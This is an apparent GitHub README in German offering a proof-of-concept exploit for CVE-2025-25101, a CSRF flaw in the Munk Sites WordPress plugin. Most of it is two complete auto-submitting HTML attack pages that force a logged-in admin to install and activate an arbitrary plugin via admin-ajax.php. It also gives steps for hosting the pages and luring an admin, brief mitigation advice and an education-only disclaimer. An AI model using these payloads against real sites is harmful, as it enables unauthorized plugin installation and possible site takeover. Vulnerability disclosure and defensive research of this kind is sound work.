
WordPress Munk Sites Plugin <= 1.0.7 - CSRF zu beliebiger Plugin-Installation Schwachstelle
CVE-2025-25101 ist eine Cross-Site-Request-Forgery (CSRF)-Sicherheitslücke im MetricThemes Munk Sites-Plugin für WordPress (Versionen ≤ 1.0.7).
Diese Sicherheitslücke ermöglicht es einem nicht authentifizierten Angreifer, einen Admin dazu zu bringen, beliebige Plugins zu installieren und zu aktivieren, was potenziell zu Remote Code Execution (RCE) oder einer Kompromittierung der Website führen kann.
<= 1.0.7Jede Version, in der das Plugin aktiv ist| Bewertung | Schweregrad | Version | Vektor-String |
|---|---|---|---|
| 9.6 | 🔥 KRITISCH | 3.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
Der CSRF-Fehler im Munk Sites-Plugin erlaubt es einem Angreifer, einen angemeldeten WordPress-Admin zu zwingen, ein beliebiges WordPress-Plugin ohne dessen Zustimmung zu installieren und zu aktivieren.
Dies geschieht durch Ausnutzen einer ungeschützten admin-ajax.php-Anfrage, die keine CSRF-Token-Überprüfung besitzt.
Diese Payload zwingt das Opfer, das Plugin hello-world zu installieren.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Installation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #5bc0de; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Installing plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_install_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>
Diese Payload zwingt das Opfer, das Plugin hello-world zu aktivieren.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Activation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #f0ad4e; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Activating plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_active_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>
install.html und activate.html) auf einem vom Angreifer kontrollierten Server.install.html zu besuchen.activate.html zu besuchen.hello-world-Plugin wird ohne Admin-Zustimmung installiert und aktiviert!admin-ajax.php mit Sicherheitsregeln in der .htaccess- oder Nginx-Konfiguration ein.wp_nonce_field() und check_admin_referer()⚠️ Dieser Exploit dient nur zu Bildungs- und Sicherheitsforschungszwecken.
⚠️ Die unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal.
⚠️ Der Autor übernimmt keine Verantwortung für den Missbrauch dieses Codes.
Wenn Sie diese Forschung wertvoll finden, können Sie gerne ⭐ das Repository mit einem Stern markieren und durch die Meldung neuer Schwachstellen beitragen.
Von: Nxploit | Khaled Alenazi